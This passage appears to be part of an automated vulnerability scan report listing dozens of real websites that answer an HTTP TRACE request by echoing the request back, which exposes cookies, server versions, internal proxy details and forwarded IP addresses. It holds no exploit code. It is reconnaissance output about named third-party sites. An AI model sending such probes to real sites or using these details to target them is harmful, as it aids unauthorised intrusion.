Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.faqs.org
Cookie: a11c00a79deadc57

21.91. http://www.fetedoris.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetedoris.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fetedoris.com
Cookie: 5af7a47a9a00c3e6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:36 GMT
Server: Apache/2.2.2 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fetedoris.com
Cookie: 5af7a47a9a00c3e6

21.92. http://www.findagrave.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findagrave.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findagrave.com
Cookie: 208edff39f5b7a0c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.findagrave.com
Cookie: 208edff39f5b7a0c

21.93. http://www.findlaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlaw.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findlaw.com
Cookie: 6723daeffb5bf741

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:29 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6723daeffb5bf741
Host: www.findlaw.com

21.94. http://www.findlocaljobsnow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlocaljobsnow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.findlocaljobsnow.com
Cookie: a553c0938697c719

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.findlocaljobsnow.com
Cookie: a553c0938697c719

21.95. http://www.flixster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.flixster.com
Cookie: 1fccc171bb2ee032

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.flixster.com
Cookie: 1fccc171bb2ee032

21.96. http://www.forbes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.forbes.com
Cookie: 7f98ee1335dba7f5

Response

HTTP/1.0 200 OK
Server: Apache/1.3.26
Content-Type: message/http
Backend: www
Content-Length: 90
Date: Sat, 02 Apr 2011 13:31:04 GMT
X-Cache: MISS
Connection: close

TRACE / HTTP/1.0
Cookie: 7f98ee1335dba7f5
Host: www.forbes.com
X-Varnish: 137817313

21.97. http://www.forless.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forless.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.forless.com
Cookie: 6c246d1fc1df3552

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.forless.com
Cookie: 6c246d1fc1df3552

21.98. http://www.formspring.me/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.formspring.me
Path:   /

Request

TRACE / HTTP/1.0
Host: www.formspring.me
Cookie: 2452ee73ca9df00

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Content-Length: 175
Connection: Close

TRACE / HTTP/1.1
host: www.formspring.me
Cookie: 2452ee73ca9df00
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.99. http://www.freelogs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelogs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freelogs.com
Cookie: 519a3a4d5bdc104b

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:10:07 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 175
Connection: Close

TRACE / HTTP/1.1
host: www.freelogs.com
Cookie: 519a3a4d5bdc104b
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.100. http://www.freeonlinegames.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freeonlinegames.com
Cookie: 6c4822f3e34d5bf3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.freeonlinegames.com
Cookie: 6c4822f3e34d5bf3

21.101. http://www.freeridegames.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.freeridegames.com
Cookie: 9f643e9b2bbcfeea

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.freeridegames.com
Cookie: 9f643e9b2bbcfeea

21.102. http://www.friendster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friendster.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.friendster.com
Cookie: 4a0383126b3c8711

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:21 GMT
Server: Apache/1.3.39 (Unix)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Client-IP: 173.193.214.243
Connection: Keep-Alive
Cookie: 4a0383126b3c8711
Host: www.friendster.com
Via: CN-5000

21.103. http://www.froo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.froo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.froo.com
Cookie: f41d3b0b4846a77f

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sat, 02 Apr 2011 14:10:13 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 171
Connection: Close

TRACE / HTTP/1.1
host: www.froo.com
Cookie: f41d3b0b4846a77f
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

21.104. http://www.funwebproducts.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funwebproducts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.funwebproducts.com
Cookie: 8bb85e6a73fa4fb9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:31 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8bb85e6a73fa4fb9
Host: www.funwebproducts.com
X-Jabodo-For: 173.193.214.243

21.105. http://www.gamesradar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gamesradar.com
Cookie: 77d6c9c7afc842b9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gamesradar.com
Cookie: 77d6c9c7afc842b9
X-Forwarded-For: 173.193.214.243

21.106. http://www.gamewinners.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamewinners.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gamewinners.com
Cookie: 3001fd731e048101

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:28 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
X-Cache: MISS from www.gamewinners.com
X-Cache-Lookup: NONE from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: close

TRACE / HTTP/1.0
Host: www.gamewinners.com
Cookie: 3001fd731e048101
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200

21.107. http://www.gardenweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gardenweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gardenweb.com
Cookie: 8bf9aca415cac5ed

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:51 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gardenweb.com
Cookie: 8bf9aca415cac5ed
X-Forwarded-For: 173.193.214.243

21.108. http://www.gather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: e6cec77c6f4e4b69

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gather.com
Cookie: e6cec77c6f4e4b69
Connection: Keep-Alive

21.109. http://www.gemoney.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemoney.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gemoney.com
Cookie: 123bde3a68cd2967

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:31 GMT
Server: IBM_HTTP_Server
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.gemoney.com
Cookie: 123bde3a68cd2967
Connection: Keep-Alive
X-BlueCoat-Via: F97C647038B5099E

21.110. http://www.genealogy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealogy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.genealogy.com
Cookie: 3394cf95ba86fe79

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerwww.genealogy.com=85567680.20480.0000; path=/

TRACE / HTTP/1.0
Cookie: 3394cf95ba86fe79
Host: www.genealogy.com

21.111. http://www.gf2ube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gf2ube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gf2ube.com
Cookie: 8246c785b437c21b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gf2ube.com
Cookie: 8246c785b437c21b

21.112. http://www.gifts.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gifts.com
Cookie: b5be123881aa1681

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: SERVERID=web07; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.gifts.com
Cookie: b5be123881aa1681
X-Forwarded-For: 173.193.214.243, 184.73.210.87

21.113. http://www.golikeus.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.golikeus.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.golikeus.net
Cookie: d3982d814d45dd8a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.golikeus.net
Cookie: d3982d814d45dd8a

21.114. http://www.gravity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gravity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.gravity.com
Cookie: b73c060ba0c8921

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.gravity.com
Cookie: b73c060ba0c8921
Connection: Keep-Alive

21.115. http://www.greatschools.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greatschools.org
Cookie: bc1bb666ec50fda9

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:43:29 GMT
Connection: close

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: bc1bb666ec50fda9
Host: www.greatschools.org
X-Cluster-Client-Ip: 173.193.214.243

21.116. http://www.guardian.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: e16c9a90184f1d6f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: e16c9a90184f1d6f

21.117. http://www.healthcare.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcare.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.healthcare.com
Cookie: bd38029a4238114a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:53 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.healthcare.com
Cookie: bd38029a4238114a

21.118. http://www.home-remedies-for-you.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.home-remedies-for-you.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.home-remedies-for-you.com
Cookie: 1fb92685445341ae

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:06 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.home-remedies-for-you.com
Cookie: 1fb92685445341ae

21.119. http://www.homegain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homegain.com
Cookie: 5f756bcd73b225c0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.homegain.com
Cookie: 5f756bcd73b225c0

21.120. http://www.homestead.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.homestead.com
Cookie: 8c33b98e90676f89

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 13:34:01 GMT
X-Powered-By: ASP.NET
Set-Cookie: BASEREFERER=referrerless; expires=Friday, 01-Jul-2011 13:34:02 GMT; path=/; domain=.homestead.com
Set-Cookie: SIGNUPEARCODE=REFERERLESS; expires=Friday, 01-Jul-2011 13:34:02 GMT; path=/; domain=.homestead.com
Set-Cookie: phsViewerID=173.193.214.243.1301751242.21672; expires=Sunday, 01-Apr-2012 13:34:02 GMT; path=/; domain=.homestead.com
Content-Type: message/http
Content-Length: 71

TRACE / HTTP/1.0
Host: www.homestead.com
Cookie: 8c33b98e90676f89

21.121. http://www.hotelguides.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelguides.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hotelguides.com
Cookie: 530d7d0f930c5521

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:29 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hotelguides.com
Cookie: 530d7d0f930c5521

21.122. http://www.iloveindia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.iloveindia.com
Cookie: 279f752052bb65ce

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.iloveindia.com
Cookie: 279f752052bb65ce

21.123. http://www.imagevenue.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imagevenue.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.imagevenue.com
Cookie: 6989997241e97b2b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:52 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.imagevenue.com
Cookie: 6989997241e97b2b

21.124. http://www.indeed.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.indeed.com
Cookie: 66e10ca5eb618921

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: NSC_vt_jbe=ffffffffad2ce57445525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:24:39 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: www.indeed.com
Cookie: 66e10ca5eb618921
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.125. http://www.infomash.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infomash.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.infomash.org
Cookie: 1e5ba26dacdc0e21

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.infomash.org
Cookie: 1e5ba26dacdc0e21

21.126. http://www.insiderpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insiderpages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.insiderpages.com
Cookie: 69bca2a232ea2953

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.insiderpages.com
Cookie: 69bca2a232ea2953
X-Forwarded-For: 173.193.214.243

21.127. http://www.itt-tech.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itt-tech.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.itt-tech.edu
Cookie: 7bcdac377624134a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:07 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.itt-tech.edu
Cookie: 7bcdac377624134a

21.128. http://www.iwon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.iwon.com
Cookie: 4e40f98aeafbc1a3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:47 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: ltm=2114148874.20480.0000; expires=Sat, 16-Apr-2011 13:31:46 GMT; path=/

TRACE / HTTP/1.0
Host: www.iwon.com
Cookie: 4e40f98aeafbc1a3
X-Jabodo-For: 173.193.214.243

21.129. http://www.jobsonline.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonline.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jobsonline.net
Cookie: 860c031c585df21

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:41 GMT
Server: Apache/2.2.11 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jobsonline.net
Cookie: 860c031c585df21
Connection: close
X-Forwarded-For: 173.193.214.243

21.130. http://www.jobsonlinemail.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonlinemail.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.jobsonlinemail.net
Cookie: 4c2a7d520fcfd9a1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.jobsonlinemail.net
Cookie: 4c2a7d520fcfd9a1

21.131. http://www.justia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.justia.com
Cookie: ffc70b24ed9a29d1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.justia.com
Cookie: ffc70b24ed9a29d1

21.132. http://www.justluxe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.justluxe.com
Cookie: 964f1d7fb78b3c20

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:48 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.justluxe.com
Cookie: 964f1d7fb78b3c20

21.133. http://www.kaboose.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kaboose.com
Cookie: aaf04dfaecbd3964

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:43 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Connection: close
Content-Type: message/http
X-UA-COMPATIBLE: IE=EmulateIE7

TRACE / HTTP/1.0
Host: www.kaboose.com
Cookie: aaf04dfaecbd3964
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.134. http://www.kazaa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kazaa.com
Cookie: 77e4d0625a0b52ac

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kazaa.com
Cookie: 77e4d0625a0b52ac

21.135. http://www.kcom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kcom.com
Cookie: 52e1f19ff171648a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kcom.com
Cookie: 52e1f19ff171648a

21.136. http://www.know-where.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.know-where.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.know-where.com
Cookie: 713d4231c291cbb6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.know-where.com
Cookie: 713d4231c291cbb6

21.137. http://www.letssingit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letssingit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.letssingit.com
Cookie: 76306020d61e273d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.letssingit.com
Cookie: 76306020d61e273d

21.138. http://www.lijit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lijit.com
Cookie: 22b26168b268740c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: PWS/1.7.1.5
X-Px: nc iad-agg-n6 ( origin>CONN)
Content-Length: 341
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: www.lijit.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n6.panthercdn.com PWS/1.7.1.5
X-Forwarded-For: 173.193.214.243, 66.114.52.16
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://www.lijit.com/
Cookie: 22b26168b268740c
Connection: keep-alive

21.139. http://www.likewut.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.likewut.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.likewut.net
Cookie: 5c6f3d09f545f641

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.likewut.net
Cookie: 5c6f3d09f545f641

21.140. http://www.liveleak.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.liveleak.com
Cookie: 4117914d6c6c1016

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.8 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.liveleak.com
Cookie: 4117914d6c6c1016

21.141. http://www.livevideo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livevideo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.livevideo.com
Cookie: 84b26fbe89d312d6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:24 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.livevideo.com
Cookie: 84b26fbe89d312d6

21.142. http://www.localpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localpages.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.localpages.com
Cookie: 4ee4960f0ae509c2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.localpages.com
Cookie: 4ee4960f0ae509c2

21.143. http://www.lowermybills.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowermybills.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lowermybills.com
Cookie: f2f272b9bfb104a5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpl.lmbprod=520364042.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.lowermybills.com
Cookie: f2f272b9bfb104a5

21.144. http://www.lowfares.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowfares.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lowfares.com
Cookie: b949a4bcbfd086b7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:41 GMT
Server: Apache/2.0.52 (CentOS)
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: 127.0.0.1:50
Cookie: b949a4bcbfd086b7
X-Forwarded-For: 173.193.214.243, 204.13.160.62
Max-Forwards: 10
X-Forwarded-Host: www.lowfares.com
X-Forwarded-Server: lowfares.com

21.145. http://www.lyrics007.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyrics007.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lyrics007.com
Cookie: 3afd84334f9dcd37

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 18:16:49 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.lyrics007.com
Cookie: 3afd84334f9dcd37

21.146. http://www.lyricsmania.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyricsmania.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.lyricsmania.com
Cookie: aba02a2c8ea7a5cd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
